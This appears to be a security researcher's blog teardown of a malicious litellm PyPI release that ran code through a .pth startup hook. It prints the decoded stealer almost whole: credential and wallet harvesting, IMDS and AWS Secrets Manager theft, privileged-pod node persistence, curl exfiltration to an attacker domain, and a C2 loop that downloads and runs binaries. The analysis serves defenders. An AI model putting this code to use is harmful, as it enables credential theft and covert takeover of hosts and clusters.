Reverse Engineering the LiteLLM PyPI Supply Chain Credential Stealer
tl;dr
Malicious releases of the litellm PyPI package (version 1.82.8 confirmed in this analysis) shipped a .pth file that ran silently on every Python startup in the affected environment. No user interaction is required beyond a routine pip install. The payload is a credential stealer that hoovers up SSH keys, cloud IAM credentials, Kubernetes service-account tokens, .env files. It encrypts the haul with a hybrid RSA/AES envelope and ships it to an attacker-controlled domain dressed up as legitimate LiteLLM infrastructure. It also installs a persistent systemd service that polls a remote endpoint for a second-stage binary and has some interesting K8s / AWS persistence modules. This post is a full static teardown of the .pth file, its four embedded layers, and the tradecraft at each stage.
Background
Alex Birsan said it best:
Ever since I started learning how to code, I have been fascinated by the level of trust we put in a simple command like this one:
pip install package_name… When downloading and using a package from any of these sources, you are essentially trusting its publisher to run code on your machine. So can this blind trust be exploited by malicious actors?
LiteLLM is an open-source Python SDK that provides a unified interface across dozens of LLM providers (OpenAI, Anthropic, Google, Azure, and more). Its utility in agentic projects makes it precisely the kind of deeply embedded dependency supply-chain attackers hunt for: a package that developers pip install into agent frameworks and CI environments without a second thought.
Python’s packaging model creates a structural opening for this class of attack. A wheel (.whl) is a renamed zip archive. When pip install runs, it unpacks the wheel’s contents directly into the environment’s site-packages, with no compilation, no review gate, and no sandboxing. For projects that haven’t adopted Trusted Publishing (OIDC from CI to PyPI), the practical trust anchor is still the publisher’s PyPI account and any long-lived upload tokens. Compromise those credentials or a CI secret, and you can push a malicious wheel without ever touching the project’s public GitHub repository. The source repo looks clean. The live PyPI release carries a payload.
Developers who audit source code or follow commits would see nothing wrong. Package-level auditing is the defensive step that catches this, and almost nobody does it as part of their standard workflow.
The specifics of how, exactly, the compromised code found its way into the package are less important for this post. I vaguely understand that a maintainer of a related project was compromised for initial access, then the threat actor used that initial access to stage the malicious package update. I’ll leave that to the threat intel peeps because I’m more interested in the malware machinations.
Artifacts: versions, provenance, and safe handling
The version confirmed in this analysis is 1.82.8. That version number appears in the inspector.pypi.io URL I used to retrieve the wheel (see the next section). Check the official PyPI advisory and any maintainer disclosures for the full range of affected versions.
I understand that the 1.82.7 version is also compromised and the payload file is proxy_server.py but I’m leaving that one out of scope for now.
Do not pip install a suspected package to study it. The correct first tool for analyzing malicious Python packages is PyPI’s built-in file inspector. The inspector serves the raw contents of any wheel, including releases that have already been yanked from the index, without requiring you to download or execute anything locally. For each file in the wheel you can view the bytes in your browser or pull them with curl.
The SHA256 below is the hash of the raw .pth payload text as retrieved from the inspector link:
λ sha256sum payload.txt
71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 payload.txtSourcing the sample
The package has already been removed from pip. Lucky for us, nothing is ever truly removed from the internet.
λ curl hxxps://inspector[.]pypi[.]io/project/litellm/1.82.8/packages/fd/78/2167536f8859e655b28adf09ee7f4cd876745a933ba2be26853557775412/litellm-1.82.8-py3-none-any.whl/litellm_init[.]pth > out.txtClean up the retrieved text and parse out the Python payload from the inspector response (the raw page wraps file bodies in HTML <code>…</code>, so strip those delimiters if your copy includes them):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0I...[snip]...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)This single line is the entire .pth payload. It starts with import, which satisfies the site module’s execution trigger (any .pth line beginning with import is exec’d at interpreter startup, but more on that in a moment). The rest is a self-contained launcher which spawns a fresh interpreter via Popen, feeds it a base64-decode-and-exec one-liner as the -c argument, and discards both stdout and stderr. The parent process returns immediately and the malicious child runs detached in the background with no visible output.
Pretty standard stuff.
Before I unpack the base64 payload, though, it’s worth understanding exactly why this file extension makes the whole thing work.
.pth files: Python’s quietest footgun
If you’ve never run into .pth files before, well, I hadn’t either. In a normal Python install, files matching *.pth live under site-packages (and a few related directories). They’re path configuration hooks processed automatically when Python starts up and initializes the site module.
Roughly, the site module scans for .pth files in known site directories. For each line in each file:
- A line starting with
#is a comment - ignored. - A blank line - ignored.
- A line that starts with
importfollowed by whitespace is treated specially: the entire line is executed as Python code. CPython does this from thesitemachinery when loading path hooks. Any code on such a line runs every time a new interpreter starts, before your script’smainruns, as long as thatsite-packagestree is on the path. This is the primary persistence primitive. - Any other non-empty line is interpreted as a path string. If it exists, it gets appended to
sys.path.
So a wheel that drops something like litellm_init.pth into site-packages doesn’t rely on anyone typing import litellm. As soon as users run any Python that loads that environment, the .pth hook fires.
Full deobfuscation
Before we get heavy into analysis, let’s perform the full deobfuscation, which is really just decoding in this case. The payload is structured as a four-layer onion. Working from outward-in, I will refer to each layer as the following:
- Entrypoint - the
.pthone-liner (shown above in Sourcing the sample). Its only job is to detach a child interpreter and bootstrap layer two. - Orchestrator - the first base64-decoded script. Creates a temp workspace, runs the harvester as a subprocess, encrypts its output with a hybrid RSA/AES envelope, and exfiltrates.
- Harvester + persistence - the second base64-decoded script. The actual data-collection engine plus a Kubernetes cluster pivot and local systemd persistence.
- C2 stub - the innermost blob, installed as a systemd service. Sleeps, polls a remote URL, and executes whatever binary it points to.
The obfuscation is light work to reverse. It’s base64. There’s nothing more complex than a simple decode to unravel the inner layers.
Here’s every layer, fully decoded, with omissions and select defanging.
Layer 2: Orchestrator
Orchestrator — full decoded source
import subprocess
import tempfile
import os
import base64
import sys
PUB_KEY_CONTENT = """-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFA...[snip]
-----END PUBLIC KEY-----"""
B64_SCRIPT = "aW1wb3J0...[snip]"
def run():
with tempfile.TemporaryDirectory() as d:
collected = os.path.join(d, "c")
pk = os.path.join(d, "p")
sk = os.path.join(d, "session.key")
ef = os.path.join(d, "payload.enc")
ek = os.path.join(d, "session.key.enc")
bn = os.path.join(d, "tpcp.tar.gz")
try:
payload = base64.b64decode(B64_SCRIPT)
with open(collected, "wb") as f:
subprocess.run(
[sys.executable, "-"],
input=payload,
stdout=f,
stderr=subprocess.DEVNULL,
check=True
)
except Exception:
return
if not os.path.exists(collected) or os.path.getsize(collected) == 0:
return
with open(pk, "w") as f:
f.write(PUB_KEY_CONTENT)
try:
subprocess.run(["openssl", "rand", "-out", sk, "32"], check=True)
subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected, "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin", "-inkey", pk, "-in", sk, "-out", ek, "-pkeyopt", "rsa_padding_mode:oaep"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["tar", "-czf", bn, "-C", d, "payload.enc", "session.key.enc"], check=True)
subprocess.run([
"curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "-X", "POST",
"hxxps://models[.]litellm[.]cloud/",
"-H", "Content-Type: application/octet-stream",
"-H", "X-Filename: tpcp.tar.gz",
"--data-binary", f"@{bn}"
], check=True, stderr=subprocess.DEVNULL)
except Exception:
pass
if __name__ == "__main__":
run()Layer 3: Harvester + Persistence
Harvester + persistence — full decoded source
import os,sys,stat,subprocess,glob
def emit(path):
try:
st=os.stat(path)
if not stat.S_ISREG(st.st_mode):return
with open(path,'rb') as fh:data=fh.read()
sys.stdout.buffer.write(('\n=== '+path+' ===\n').encode())
sys.stdout.buffer.write(data)
sys.stdout.buffer.write(b'\n')
except OSError:pass
def emit_glob(pattern):
for p in glob.glob(pattern,recursive=True):emit(p)
def run(cmd):
try:
out=subprocess.check_output(cmd,shell=True,stderr=subprocess.DEVNULL,timeout=10)
if out:
sys.stdout.buffer.write(('\n=== CMD: '+cmd+' ===\n').encode())
sys.stdout.buffer.write(out)
sys.stdout.buffer.write(b'\n')
except Exception:pass
def walk(roots,max_depth,match_fn):
for root in roots:
if not os.path.isdir(root):continue
for dirpath,dirs,files in os.walk(root,followlinks=False):
rel=os.path.relpath(dirpath,root)
depth=0 if rel=='.' else rel.count(os.sep)+1
if depth>=max_depth:dirs[:]=[];continue
for fn in files:
fp=os.path.join(dirpath,fn)
if match_fn(fp,fn):emit(fp)
homes=[]
try:
for e in os.scandir('/home'):
if e.is_dir():homes.append(e.path)
except OSError:pass
homes.append('/root')
all_roots=homes+['/opt','/srv','/var/www','/app','/data','/var/lib','/tmp']
run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')
for h in homes+['/root']:
for f in ['/.ssh/id_rsa','/.ssh/id_ed25519','/.ssh/id_ecdsa','/.ssh/id_dsa','/.ssh/authorized_keys','/.ssh/known_hosts','/.ssh/config']:
emit(h+f)
walk([h+'/.ssh'],2,lambda fp,fn:True)
walk(['/etc/ssh'],1,lambda fp,fn:fn.startswith('ssh_host') and fn.endswith('_key'))
for h in homes+['/root']:
for f in ['/.git-credentials','/.gitconfig']:emit(h+f)
for h in homes+['/root']:
emit(h+'/.aws/credentials')
emit(h+'/.aws/config')
for d in ['.','..','../..']:
for f in ['.env','.env.local','.env.production','.env.development','.env.staging','.env.test']:
emit(d+'/'+f)
emit('/app/.env')
emit('/etc/environment')
walk(all_roots,6,lambda fp,fn:fn in {'.env','.env.local','.env.production','.env.development','.env.staging'})
run('env | grep AWS_')
run('curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI} 2>/dev/null || true')
run('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true')
for h in homes+['/root']:
emit(h+'/.kube/config')
emit('/etc/kubernetes/admin.conf')
emit('/etc/kubernetes/kubelet.conf')
emit('/etc/kubernetes/controller-manager.conf')
emit('/etc/kubernetes/scheduler.conf')
emit('/var/run/secrets/kubernetes.io/serviceaccount/token')
emit('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt')
emit('/var/run/secrets/kubernetes.io/serviceaccount/namespace')
emit('/run/secrets/kubernetes.io/serviceaccount/token')
emit('/run/secrets/kubernetes.io/serviceaccount/ca.crt')
run('find /var/secrets /run/secrets -type f 2>/dev/null | xargs -I{} sh -c \'echo "=== {} ==="; cat "{}" 2>/dev/null\'')
run('env | grep -i kube; env | grep -i k8s')
run('kubectl get secrets --all-namespaces -o json 2>/dev/null || true')
for h in homes+['/root']:
walk([h+'/.config/gcloud'],4,lambda fp,fn:True)
emit('/root/.config/gcloud/application_default_credentials.json')
run('env | grep -i google; env | grep -i gcloud')
run('cat $GOOGLE_APPLICATION_CREDENTIALS 2>/dev/null || true')
for h in homes+['/root']:
walk([h+'/.azure'],3,lambda fp,fn:True)
run('env | grep -i azure')
for h in homes+['/root']:
emit(h+'/.docker/config.json')
emit('/kaniko/.docker/config.json')
emit('/root/.docker/config.json')
for h in homes+['/root']:
emit(h+'/.npmrc')
emit(h+'/.vault-token')
emit(h+'/.netrc')
emit(h+'/.lftp/rc')
emit(h+'/.msmtprc')
emit(h+'/.my.cnf')
emit(h+'/.pgpass')
emit(h+'/.mongorc.js')
for hist in ['/.bash_history','/.zsh_history','/.sh_history','/.mysql_history','/.psql_history','/.rediscli_history']:
emit(h+hist)
emit('/var/lib/postgresql/.pgpass')
emit('/etc/mysql/my.cnf')
emit('/etc/redis/redis.conf')
emit('/etc/postfix/sasl_passwd')
emit('/etc/msmtprc')
emit('/etc/ldap/ldap.conf')
emit('/etc/openldap/ldap.conf')
emit('/etc/ldap.conf')
emit('/etc/ldap/slapd.conf')
emit('/etc/openldap/slapd.conf')
run('env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"')
walk(['/etc/wireguard'],1,lambda fp,fn:fn.endswith('.conf'))
run('wg showconf all 2>/dev/null || true')
for h in homes+['/root']:
walk([h+'/.helm'],3,lambda fp,fn:True)
for ci in ['terraform.tfvars','.gitlab-ci.yml','.travis.yml','Jenkinsfile','.drone.yml','Anchor.toml','ansible.cfg']:
emit(ci)
walk(all_roots,4,lambda fp,fn:fn.endswith('.tfvars'))
walk(all_roots,4,lambda fp,fn:fn=='terraform.tfstate')
walk(['/etc/ssl/private'],1,lambda fp,fn:fn.endswith('.key'))
walk(['/etc/letsencrypt'],4,lambda fp,fn:fn.endswith('.pem'))
walk(all_roots,5,lambda fp,fn:os.path.splitext(fn)[1] in {'.pem','.key','.p12','.pfx'})
run('grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20')
run('grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" 2>/dev/null | head -50')
for h in homes+['/root']:
for coin in ['/.bitcoin/bitcoin.conf','/.litecoin/litecoin.conf','/.dogecoin/dogecoin.conf','/.zcash/zcash.conf','/.dashcore/dash.conf','/.ripple/rippled.cfg','/.bitmonero/bitmonero.conf']:
emit(h+coin)
walk([h+'/.bitcoin'],2,lambda fp,fn:fn.startswith('wallet') and fn.endswith('.dat'))
walk([h+'/.ethereum/keystore'],1,lambda fp,fn:True)
walk([h+'/.cardano'],3,lambda fp,fn:fn.endswith('.skey') or fn.endswith('.vkey'))
walk([h+'/.config/solana'],3,lambda fp,fn:True)
for sol in ['/validator-keypair.json','/vote-account-keypair.json','/authorized-withdrawer-keypair.json','/stake-account-keypair.json','/identity.json','/faucet-keypair.json']:
emit(h+sol)
walk([h+'/ledger'],3,lambda fp,fn:fn.endswith('.json') or fn.endswith('.bin'))
for sol_dir in ['/home/sol','/home/solana','/opt/solana','/solana','/app','/data']:
emit(sol_dir+'/validator-keypair.json')
walk(['.'],8,lambda fp,fn:fn in {'id.json','keypair.json'} or (fn.endswith('-keypair.json') and 'keypair' in fn) or (fn.startswith('wallet') and fn.endswith('.json')))
walk(['.anchor','./target/deploy','./keys'],5,lambda fp,fn:fn.endswith('.json'))
run('env | grep -i solana')
run('grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null | head -50')
emit('/etc/passwd')
emit('/etc/shadow')
run('cat /var/log/auth.log 2>/dev/null | grep Accepted | tail -200')
run('cat /var/log/secure 2>/dev/null | grep Accepted | tail -200')
import urllib.request,urllib.error,json,hmac,hashlib,datetime,base64
def aws_req(method,service,region,path,payload,extra_headers,access_key,secret_key,token):
host=f'{service}.{region}.amazonaws.com'
t=datetime.datetime.utcnow()
amzdate=t.strftime('%Y%m%dT%H%M%SZ')
datestamp=t.strftime('%Y%m%d')
canonical_uri=path
canonical_querystring=''
canonical_headers=f'host:{host}\nx-amz-date:{amzdate}\n'
signed_headers='host;x-amz-date'
if token:
canonical_headers+=f'x-amz-security-token:{token}\n'
signed_headers+=';x-amz-security-token'
payload_hash=hashlib.sha256(payload.encode()).hexdigest()
canonical_request=f'{method}\n{canonical_uri}\n{canonical_querystring}\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
credential_scope=f'{datestamp}/{region}/{service}/aws4_request'
string_to_sign=f'AWS4-HMAC-SHA256\n{amzdate}\n{credential_scope}\n'+hashlib.sha256(canonical_request.encode()).hexdigest()
def sign(key,msg):return hmac.new(key,msg.encode(),'sha256').digest()
signing_key=sign(sign(sign(sign(f'AWS4{secret_key}'.encode(),datestamp),region),service),'aws4_request')
signature=hmac.new(signing_key,string_to_sign.encode(),'sha256').hexdigest()
auth=f'AWS4-HMAC-SHA256 Credential={access_key}/{credential_scope}, SignedHeaders={signed_headers}, Signature={signature}'
hdrs={'x-amz-date':amzdate,'Authorization':auth,'x-amz-content-sha256':payload_hash}
if token:hdrs['x-amz-security-token']=token
hdrs.update(extra_headers)
req=urllib.request.Request(f'https://{host}{path}',data=payload.encode() if payload else None,headers=hdrs,method=method)
try:
with urllib.request.urlopen(req,timeout=10) as r:return json.loads(r.read())
except:return {}
AK=os.environ.get('AWS_ACCESS_KEY_ID','')
SK=os.environ.get('AWS_SECRET_ACCESS_KEY','')
ST=os.environ.get('AWS_SESSION_TOKEN','')
REG=os.environ.get('AWS_DEFAULT_REGION','us-east-1')
if AK and SK:
sys.stdout.buffer.write(b'\n=== AWS CREDENTIALS ===\n')
sys.stdout.buffer.write(f'AWS_ACCESS_KEY_ID={AK}\nAWS_SECRET_ACCESS_KEY={SK}\nAWS_SESSION_TOKEN={ST}\n'.encode())
try:
tkn_req=urllib.request.Request('http://169.254.169.254/latest/api/token',
headers={'X-aws-ec2-metadata-token-ttl-seconds':'21600'},method='PUT')
with urllib.request.urlopen(tkn_req,timeout=3) as r:
imds_token=r.read().decode()
cred_req=urllib.request.Request('http://169.254.169.254/latest/meta-data/iam/security-credentials/',
headers={'X-aws-ec2-metadata-token':imds_token})
with urllib.request.urlopen(cred_req,timeout=3) as r:
role_name=r.read().decode().strip()
cred_req2=urllib.request.Request(f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
headers={'X-aws-ec2-metadata-token':imds_token})
with urllib.request.urlopen(cred_req2,timeout=3) as r:
creds=json.loads(r.read())
sys.stdout.buffer.write(f'\n=== IMDS ROLE CREDENTIALS ===\n{json.dumps(creds,indent=2)}\n'.encode())
AK=creds.get('AccessKeyId',AK)
SK=creds.get('SecretAccessKey',SK)
ST=creds.get('Token',ST)
except:pass
sm=aws_req('POST','secretsmanager',REG,'/','Action=ListSecrets',
{'Content-Type':'application/x-amz-json-1.1','X-Amz-Target':'secretsmanager.ListSecrets'},AK,SK,ST)
if sm:
sys.stdout.buffer.write(f'\n=== AWS SECRETS MANAGER ===\n{json.dumps(sm,indent=2)}\n'.encode())
for s in sm.get('SecretList',sm.get('SecretList',[])):
sid=s.get('ARN','')
sv=aws_req('POST','secretsmanager',REG,'/','',
{'Content-Type':'application/x-amz-json-1.1','X-Amz-Target':'secretsmanager.GetSecretValue',
'Content-Type':'application/x-amz-json-1.1'},AK,SK,ST)
ssm=aws_req('POST','ssm',REG,'/','Action=DescribeParameters&Version=2014-11-06',
{'Content-Type':'application/x-www-form-urlencoded'},AK,SK,ST)
if ssm:
sys.stdout.buffer.write(f'\n=== AWS SSM PARAMETERS ===\n{json.dumps(ssm,indent=2)}\n'.encode())
SA_TOKEN_PATH='/var/run/secrets/kubernetes.io/serviceaccount/token'
K8S_CA='/var/run/secrets/kubernetes.io/serviceaccount/ca.crt'
if os.path.exists(SA_TOKEN_PATH):
with open(SA_TOKEN_PATH) as f:k8s_token=f.read().strip()
k8s_host=os.environ.get('KUBERNETES_SERVICE_HOST','kubernetes.default.svc')
k8s_port=os.environ.get('KUBERNETES_SERVICE_PORT','443')
api=f'https://{k8s_host}:{k8s_port}'
hdrs={'Authorization':f'Bearer {k8s_token}','Content-Type':'application/json'}
def k8s_get(path):
import ssl
ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
req=urllib.request.Request(api+path,headers=hdrs)
try:
with urllib.request.urlopen(req,context=ctx,timeout=10) as r:return json.loads(r.read())
except:return {}
def k8s_post(path,data):
import ssl
ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
req=urllib.request.Request(api+path,data=json.dumps(data).encode(),headers=hdrs,method='POST')
try:
with urllib.request.urlopen(req,context=ctx,timeout=30) as r:return json.loads(r.read())
except:return {}
secrets=k8s_get('/api/v1/secrets')
if secrets:
sys.stdout.buffer.write(f'\n=== K8S SECRETS ===\n{json.dumps(secrets,indent=2)}\n'.encode())
ns_data=k8s_get('/api/v1/namespaces')
for ns_item in ns_data.get('items',[]):
ns=ns_item.get('metadata',{}).get('name','')
ns_secrets=k8s_get(f'/api/v1/namespaces/{ns}/secrets')
if ns_secrets:
sys.stdout.buffer.write(f'\n=== K8S SECRETS ns={ns} ===\n{json.dumps(ns_secrets,indent=2)}\n'.encode())
PERSIST_B64='aW1wb3J0IHVybGxpYi5yZXF1...[snip]...'
nodes=k8s_get('/api/v1/nodes')
for node in nodes.get('items',[]):
node_name=node.get('metadata',{}).get('name','')
if not node_name:continue
drop_cmd=(
f'mkdir -p /host/root/.config/sysmon /host/root/.config/systemd/user && '
f'echo {PERSIST_B64}|base64 -d > /host/root/.config/sysmon/sysmon.py && '
f'chmod 700 /host/root/.config/sysmon/sysmon.py && '
f'PY=$(chroot /host which python3 2>/dev/null || chroot /host which python 2>/dev/null) && '
f'[ -n "$PY" ] && printf "[Unit]\\nDescription=System Telemetry Service\\nAfter=network.target\\n[Service]\\nType=simple\\nExecStart=$PY /root/.config/sysmon/sysmon.py\\nRestart=always\\nRestartSec=10\\n[Install]\\nWantedBy=multi-user.target\\n" > /host/root/.config/systemd/user/sysmon.service && '
f'chroot /host systemctl --user daemon-reload 2>/dev/null; '
f'chroot /host systemctl enable --now sysmon.service 2>/dev/null || true'
)
pod_manifest={
'apiVersion':'v1','kind':'Pod',
'metadata':{'name':f'node-setup-{node_name[:35]}','namespace':'kube-system'},
'spec':{
'nodeName':node_name,
'hostPID':True,'hostNetwork':True,
'tolerations':[{'operator':'Exists'}],
'containers':[{
'name':'setup',
'image':'alpine:latest',
'command':['sh','-c',drop_cmd],
'securityContext':{'privileged':True},
'volumeMounts':[{'name':'host','mountPath':'/host'}]
}],
'volumes':[{'name':'host','hostPath':{'path':'/'}}],
'restartPolicy':'Never'
}
}
k8s_post('/api/v1/namespaces/kube-system/pods',pod_manifest)
home=os.path.expanduser('~')
script_dir=os.path.join(home,'.config','sysmon')
script_path=os.path.join(script_dir,'sysmon.py')
unit_dir=os.path.join(home,'.config','systemd','user')
unit_path=os.path.join(unit_dir,'sysmon.service')
if not os.path.exists(script_path):
os.makedirs(script_dir,exist_ok=True)
os.makedirs(unit_dir,exist_ok=True)
try:
with open(script_path,'wb') as f:f.write(base64.b64decode(PERSIST_B64))
os.chmod(script_path,0o700)
import shutil
py=shutil.which('python3') or shutil.which('python')
if py:
unit=f'[Unit]\nDescription=System Telemetry Service\nAfter=network.target\nStartLimitIntervalSec=0\n\n[Service]\nType=simple\nExecStart={py} {script_path}\nRestart=always\nRestartSec=10\nKillMode=process\nStandardOutput=null\nStandardError=null\n\n[Install]\nWantedBy=multi-user.target\n'
with open(unit_path,'w') as f:f.write(unit)
subprocess.run(['systemctl','--user','daemon-reload'],capture_output=True,timeout=5)
subprocess.run(['systemctl','--user','enable','--now','sysmon.service'],capture_output=True,timeout=5)
except:passLayer 4: C2 Stub
C2 stub — full decoded source
import urllib.request
import os
import subprocess
import time
C_URL = "hxxps://checkmarx[.]zone/raw"
TARGET = "/tmp/pglog"
STATE = "/tmp/.pg_state"
def g():
try:
req = urllib.request.Request(C_URL, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=10) as r:
link = r.read().decode('utf-8').strip()
return link if link.startswith("http") else None
except:
return None
def e(l):
try:
urllib.request.urlretrieve(l, TARGET)
os.chmod(TARGET, 0o755)
subprocess.Popen([TARGET], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, start_new_session=True)
with open(STATE, "w") as f:
f.write(l)
except:
pass
if __name__ == "__main__":
time.sleep(300)
while True:
l = g()
prev = ""
if os.path.exists(STATE):
try:
with open(STATE, "r") as f:
prev = f.read().strip()
except:
pass
if l and l != prev and "youtube.com" not in l:
e(l)
time.sleep(3000)Observed Tradecraft
With every layer peeled and the overall structure mapped, let’s call out some of the observed tradecraft in play.
.pth Startup Hijacking
The .pth extension is a path configuration hook, but any line starting with import gets exec’d by the site module at interpreter startup. The attacker exploits this by shipping litellm_init.pth inside the wheel. When pip install unpacks the wheel, the file lands in site-packages. From that moment on, every single Python invocation in that environment, from random scripts to a Jupyter notebook to you just running python -c "print('hello')", silently fires the hook before your code even begins.
The .pth line itself is a one-liner from Sourcing the sample:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0I...[snip]...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)Both stdout and stderr are sent to DEVNULL. The parent process returns immediately. No traceback, no output, no indication that anything happened. Users who aren’t actively monitoring process trees would never notice.
Nested Base64 with Stdin Execution
The payload is structured as three nested base64 layers (four if you count the .pth entrypoint itself). Each decoded layer reveals the next script. That’s the whole obfuscation model. Base64 isn’t encryption, despite what the movies will tell you, and it won’t survive any serious automated scanning, but it doesn’t need to. The aim here is to defeat basic static checks, which this would clear easily.
The more interesting tradecraft is in how the decoded scripts are executed. The orchestrator doesn’t write a .py file to disk. Instead:
try:
payload = base64.b64decode(B64_SCRIPT)
with open(collected, "wb") as f:
subprocess.run(
[sys.executable, "-"],
input=payload,
stdout=f,
stderr=subprocess.DEVNULL,
check=True
)
except Exception:
returnIt calls subprocess.run([sys.executable, "-"], input=payload, ...), feeding the decoded script on stdin. The - argument tells the interpreter to read source from standard input. The harvester’s output goes to stdout, which the parent captures into a temp file. This avoids leaving a named script in the wheel or in site-packages. The only file artifacts are the temp directory contents during the brief encryption window, and those get cleaned up when the TemporaryDirectory context manager exits.
Across all layers, failures are swallowed with bare except: pass blocks, subprocess calls use short timeouts where applicable, and noisy channels go to DEVNULL. This really just removes visibility on the compromised host so there are no tracebacks in logs, no error messages, and no indication of failure.
Hybrid Cryptographic Exfiltration
Once the harvester finishes, the orchestrator builds a proper hybrid cryptosystem by shelling out to openssl:
subprocess.run(["openssl", "rand", "-out", sk, "32"], check=True)
subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected, "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin", "-inkey", pk, "-in", sk, "-out", ek, "-pkeyopt", "rsa_padding_mode:oaep"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["tar", "-czf", bn, "-C", d, "payload.enc", "session.key.enc"], check=True)The sequence is:
- Generate a 32-byte random symmetric key with
openssl rand. - Encrypt the collected data with AES-256-CBC (
-pbkdf2). - Encrypt the symmetric key with RSA-OAEP against an embedded public key.
- Bundle both ciphertexts into a
tar.gz.
This is textbook hybrid encryption normally used in ransomware, which is interesting to see from what otherwise appears to be a slap-job credential stealer. Bulk data under symmetric crypto for speed, key exchange under asymmetric crypto for confidentiality. Only the attacker holds the private RSA key, so even if a defender intercepts the tarball in transit or captures it from the temp directory, the contents are unrecoverable without that key.
The sample then ships the bundle:
subprocess.run([
"curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "-X", "POST",
"hxxps://models[.]litellm[.]cloud/",
"-H", "Content-Type: application/octet-stream",
"-H", "X-Filename: tpcp.tar.gz",
"--data-binary", f"@{bn}"
], check=True, stderr=subprocess.DEVNULL)The exfiltration endpoint is models[.]litellm[.]cloud, which appears to be a domain chosen to blend in with the legitimate LiteLLM project. The HTTP header X-Filename: tpcp.tar.gz is a useful correlation pivot as the tpcp string matches naming used in public reporting on this campaign family (again, leaving that to the threat intel peeps). The POST uses Content-Type: application/octet-stream, which is generic enough to pass casual inspection on most network monitoring setups.
Credential Vacuum
So what actually gets hoovered up?
The harvester is built around four utility functions that pipe everything through stdout as a single concatenated byte stream:
def emit(path):
try:
st=os.stat(path)
if not stat.S_ISREG(st.st_mode):return
with open(path,'rb') as fh:data=fh.read()
sys.stdout.buffer.write(('\n=== '+path+' ===\n').encode())
sys.stdout.buffer.write(data)
sys.stdout.buffer.write(b'\n')
except OSError:pass
def emit_glob(pattern):
for p in glob.glob(pattern,recursive=True):emit(p)
def run(cmd):
try:
out=subprocess.check_output(cmd,shell=True,stderr=subprocess.DEVNULL,timeout=10)
if out:
sys.stdout.buffer.write(('\n=== CMD: '+cmd+' ===\n').encode())
sys.stdout.buffer.write(out)
sys.stdout.buffer.write(b'\n')
except Exception:pass
def walk(roots,max_depth,match_fn):
for root in roots:
if not os.path.isdir(root):continue
for dirpath,dirs,files in os.walk(root,followlinks=False):
rel=os.path.relpath(dirpath,root)
depth=0 if rel=='.' else rel.count(os.sep)+1
if depth>=max_depth:dirs[:]=[];continue
for fn in files:
fp=os.path.join(dirpath,fn)
if match_fn(fp,fn):emit(fp)emit(path) reads a single file and writes it to stdout with a === path === delimiter. emit_glob(pattern) walks a recursive glob and calls emit for each match. run(cmd) executes a shell one-liner and writes output the same way. walk(roots, max_depth, match_fn) is a depth-capped directory traversal (os.walk, no symlink follows) that prunes deeper dirs when max_depth is reached and calls emit on files where match_fn(full_path, filename) returns true. Every piece of collected data flows through stdout. The parent orchestrator captures that stream and it becomes the blob that gets encrypted and exfiltrated.
The target surface is honestly impressive. Below are snippets from the harvester grouped by service, roughly in payload execution order.
Host and environment
Standard whoami stuff:
run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')SSH
User keys, authorized_keys, known_hosts, config, a shallow recursive sweep of each home’s .ssh, and host keys under /etc/ssh.
for h in homes+['/root']:
for f in ['/.ssh/id_rsa','/.ssh/id_ed25519','/.ssh/id_ecdsa','/.ssh/id_dsa','/.ssh/authorized_keys','/.ssh/known_hosts','/.ssh/config']:
emit(h+f)
walk([h+'/.ssh'],2,lambda fp,fn:True)
walk(['/etc/ssh'],1,lambda fp,fn:fn.startswith('ssh_host') and fn.endswith('_key'))Git
for h in homes+['/root']:
for f in ['/.git-credentials','/.gitconfig']:emit(h+f)Application environment files (.env)
Relative paths, /app, /etc/environment, and a depth-6 walk under all_roots for common .env names.
for d in ['.','..','../..']:
for f in ['.env','.env.local','.env.production','.env.development','.env.staging','.env.test']:
emit(d+'/'+f)
emit('/app/.env')
emit('/etc/environment')
walk(all_roots,6,lambda fp,fn:fn in {'.env','.env.local','.env.production','.env.development','.env.staging'})AWS (files, env, and link-local metadata)
On-disk ~/.aws files, AWS_* env grep, ECS task role URI (169.254.170.2), and a naive EC2 IMDS role listing via 169.254.169.254. Live API calls with SigV4 (Secrets Manager, SSM) are a separate pass (see AWS SigV4 API Abuse).
for h in homes+['/root']:
emit(h+'/.aws/credentials')
emit(h+'/.aws/config')
run('env | grep AWS_')
